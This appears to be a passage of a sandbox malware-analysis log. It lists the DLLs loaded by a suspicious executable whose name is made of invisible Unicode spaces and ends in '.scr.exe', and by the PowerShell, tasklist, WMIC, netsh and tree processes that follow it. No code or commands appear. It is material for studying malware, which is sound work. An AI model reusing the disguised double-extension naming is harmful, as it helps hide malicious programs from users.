Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
